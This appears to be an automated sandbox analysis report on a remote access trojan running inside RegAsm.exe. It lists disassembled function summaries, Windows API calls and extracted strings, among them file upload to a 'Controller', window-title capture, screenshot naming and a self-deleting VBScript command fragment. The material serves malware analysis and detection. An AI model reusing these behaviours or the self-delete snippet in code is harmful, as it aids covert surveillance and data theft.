                          • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                          • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                          • _wcslen.LIBCMT ref: 0041C1CC
                          • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                          • GetLastError.KERNEL32 ref: 0041C204
                          • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                          • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                          • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                          • GetLastError.KERNEL32 ref: 0041C261
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                          • String ID: ?
                          • API String ID: 3941738427-1684325040
                          • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                          • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                          • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                          • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _strlen
                          • String ID: %m$~$Gon~$~F@7$~dra
                          • API String ID: 4218353326-230879103
                          • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                          • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                          • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                          • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                          • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseEnumOpen
                          • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                          • API String ID: 1332880857-3714951968
                          • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                          • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                          • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                          • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                          APIs
                          • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                          • GetCursorPos.USER32(?), ref: 0041D67A
                          • SetForegroundWindow.USER32(?), ref: 0041D683
                          • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                          • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                          • ExitProcess.KERNEL32 ref: 0041D6F6
                          • CreatePopupMenu.USER32 ref: 0041D6FC
                          • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                          • String ID: Close
                          • API String ID: 1657328048-3535843008
                          • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                          • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                          • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                          • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$Info
                          • String ID:
                          • API String ID: 2509303402-0
                          • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                          • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                          • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                          • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                          APIs
                          • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                          • __aulldiv.LIBCMT ref: 00408D88
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                          • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                          • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                          • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                          • CloseHandle.KERNEL32(00000000), ref: 00409037
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                          • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                          • API String ID: 3086580692-2582957567
                          • Opcode ID: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                          • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                          • Opcode Fuzzy Hash: 1eca58239539986b7f47a22af75df51a2b8eece64db44562e943364f676ba915
                          • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 10007D06
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090D7
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090E9
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100090FB
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000910D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000911F
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009131
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009143
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009155
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009167
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 10009179
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000918B
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 1000919D
                            • Part of subcall function 100090BA: _free.LIBCMT ref: 100091AF
                          • _free.LIBCMT ref: 10007CFB
                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                          • _free.LIBCMT ref: 10007D1D
                          • _free.LIBCMT ref: 10007D32
                          • _free.LIBCMT ref: 10007D3D
                          • _free.LIBCMT ref: 10007D5F
                          • _free.LIBCMT ref: 10007D72
                          • _free.LIBCMT ref: 10007D80
                          • _free.LIBCMT ref: 10007D8B
                          • _free.LIBCMT ref: 10007DC3
                          • _free.LIBCMT ref: 10007DCA
                          • _free.LIBCMT ref: 10007DE7
                          • _free.LIBCMT ref: 10007DFF
                          Memory Dump Source
                          • Source File: 00000009.00000002.884960660.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                          • Associated: 00000009.00000002.884956553.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884960660.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction ID: 6de9b84f5b51ee4e35cbeb1ed48e08772f21b212059d2ac72beb9c863e9ed859
                          • Opcode Fuzzy Hash: 04f87de51616aa77c632626b63215b7c3e2981daeb02be256c48a4a07a0be686
                          • Instruction Fuzzy Hash: 90313931A04645EFFB21DA38E941B6A77FAFF002D1F11446AE84DDB159DE3ABC809B14
                          APIs
                          • ___free_lconv_mon.LIBCMT ref: 0045138A
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045059F
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505B1
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505C3
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505D5
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505E7
                            • Part of subcall function 00450582: _free.LIBCMT ref: 004505F9
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045060B
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045061D
                            • Part of subcall function 00450582: _free.LIBCMT ref: 0045062F
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450641
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450653
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450665
                            • Part of subcall function 00450582: _free.LIBCMT ref: 00450677
                          • _free.LIBCMT ref: 0045137F
                            • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                          • _free.LIBCMT ref: 004513A1
                          • _free.LIBCMT ref: 004513B6
                          • _free.LIBCMT ref: 004513C1
                          • _free.LIBCMT ref: 004513E3
                          • _free.LIBCMT ref: 004513F6
                          • _free.LIBCMT ref: 00451404
                          • _free.LIBCMT ref: 0045140F
                          • _free.LIBCMT ref: 00451447
                          • _free.LIBCMT ref: 0045144E
                          • _free.LIBCMT ref: 0045146B
                          • _free.LIBCMT ref: 00451483
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                          • String ID:
                          • API String ID: 161543041-0
                          • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                          • Instruction ID: 2428002f6fd8eb1a99257b9b861ac38f7c05b5b97acacff09fd9d8cf260fe807
                          • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                          • Instruction Fuzzy Hash: 403193715003009FEB20AA39D846F5B73E8EF02315F62992FE849D7662DF78AD44C729
                          APIs
                          • __EH_prolog.LIBCMT ref: 0041A04A
                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                          • API String ID: 489098229-1431523004
                          • Opcode ID: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                          • Opcode Fuzzy Hash: a9a564c4fa78c27a57715e2126324e45245b8a766e259b72a025c3b0d3967f40
                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                          APIs
                          • Sleep.KERNEL32(00001388), ref: 0040A77B
                            • Part of subcall function 0040A6B0: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                            • Part of subcall function 0040A6B0: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                            • Part of subcall function 0040A6B0: Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                            • Part of subcall function 0040A6B0: CloseHandle.KERNEL32(00000000), ref: 0040A729
                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040A7B7
                          • GetFileAttributesW.KERNEL32(00000000), ref: 0040A7C8
                          • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040A7DF
                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040A859
                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                          • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466478,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A962
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                          • String ID: 8SG$8SG$;|$PG$PG
                          • API String ID: 3795512280-2657715368
                          • Opcode ID: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                          • Instruction ID: 2a79d88b44a8fc0b04dcb000ea34af81e4c48788ca5147296d011aa32960a087
                          • Opcode Fuzzy Hash: 9258c9cb72664625fd59994fadaa45554d81da2cd969a08f99f121fbef191fed
                          • Instruction Fuzzy Hash: B6516E716043015ACB15BB72C866ABE77AA9F80349F00483FF646B71E2DF7C9D09865E
                          APIs
                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 0041374F
                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32 ref: 00413768
                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                          • ExitProcess.KERNEL32 ref: 0040D9FF
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                          • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                          • API String ID: 1913171305-3159800282
                          • Opcode ID: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                          • Opcode Fuzzy Hash: 8db7f9089fcdac6088c6dca5af5b566ceab7d3a4e33a82e448366c6afc64066d
                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID:
                          • API String ID: 269201875-0
                          • Opcode ID: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                          • Instruction ID: 80ca3ff3fa16d46db3e6ae4c9b8471dba03f652ca918f9f25067e0b92ee87d4d
                          • Opcode Fuzzy Hash: f91d4b90763e5671f10523a72ee64b05bbc7cd6159c247d47fb1287d0ca389aa
                          • Instruction Fuzzy Hash: 30C183B6D40204ABEB20DBA9CC43FDE77F8AB09705F150166FE04EB283D6B49D459768
                          APIs
                            • Part of subcall function 00455929: CreateFileW.KERNEL32(00000000,00000000,?,00455D04,?,?,00000000), ref: 00455946
                          • GetLastError.KERNEL32 ref: 00455D6F
                          • __dosmaperr.LIBCMT ref: 00455D76
                          • GetFileType.KERNEL32 ref: 00455D82
                          • GetLastError.KERNEL32 ref: 00455D8C
                          • __dosmaperr.LIBCMT ref: 00455D95
                          • CloseHandle.KERNEL32(00000000), ref: 00455DB5
                          • CloseHandle.KERNEL32(?), ref: 00455EFF
                          • GetLastError.KERNEL32 ref: 00455F31
                          • __dosmaperr.LIBCMT ref: 00455F38
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: H
                          • API String ID: 4237864984-2852464175
                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                          • Instruction ID: 7cd045c9b8f196398d23f94ba58010557f508cd7b58f44c29b3e784ccbbfb847
                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                          • Instruction Fuzzy Hash: 44A14532A106049FDF19AF68DC657BE3BA0EB06325F24015EEC11AB392D6398D1AC759
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _free
                          • String ID: \&G$\&G$`&G
                          • API String ID: 269201875-253610517
                          • Opcode ID: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                          • Instruction ID: 59c4f5d9f803fa3be21c2588ad204ea2c1e8261bb9e1a4607c4596bf86990b35
                          • Opcode Fuzzy Hash: fb4e3dbc149d2c7ead481d14af816bdca3ff316622b678324ba67e9487465dd6
                          • Instruction Fuzzy Hash: 86610E75900205AFDB21DF69C842B9ABBF4EF06710F24426BED44EB242E774AD45CB58
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 65535$udp
                          • API String ID: 0-1267037602
                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                          • GetForegroundWindow.USER32 ref: 0040AD84
                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                          • GetWindowTextW.USER32(00000000,00000000,00000000,00000001,00000000), ref: 0040ADC1
                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                          • String ID: [${ User has been idle for $ minutes }$]
                          • API String ID: 911427763-3954389425
                          • Opcode ID: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                          • Opcode Fuzzy Hash: 48f1adaacdea2f975f01b8500f115fca2f5cc24c7704d57e661a1b5e6bda6b32
                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                          • __dosmaperr.LIBCMT ref: 0043A926
                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                          • __dosmaperr.LIBCMT ref: 0043A963
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                          • __dosmaperr.LIBCMT ref: 0043A9B7
                          • _free.LIBCMT ref: 0043A9C3
                          • _free.LIBCMT ref: 0043A9CA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                          • String ID:
                          • API String ID: 2441525078-0
                          • Opcode ID: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                          • Opcode Fuzzy Hash: 1b21161869a1c6c97ce00f002d4111b93a94d55ba7b455788bfa216644d838f2
                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                          • GetMessageA.USER32 ref: 0040556F
                          • TranslateMessage.USER32(?), ref: 0040557E
                          • DispatchMessageA.USER32(?), ref: 00405589
                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                          • String ID: CloseChat$DisplayMessage$GetMessage
                          • API String ID: 2956720200-749203953
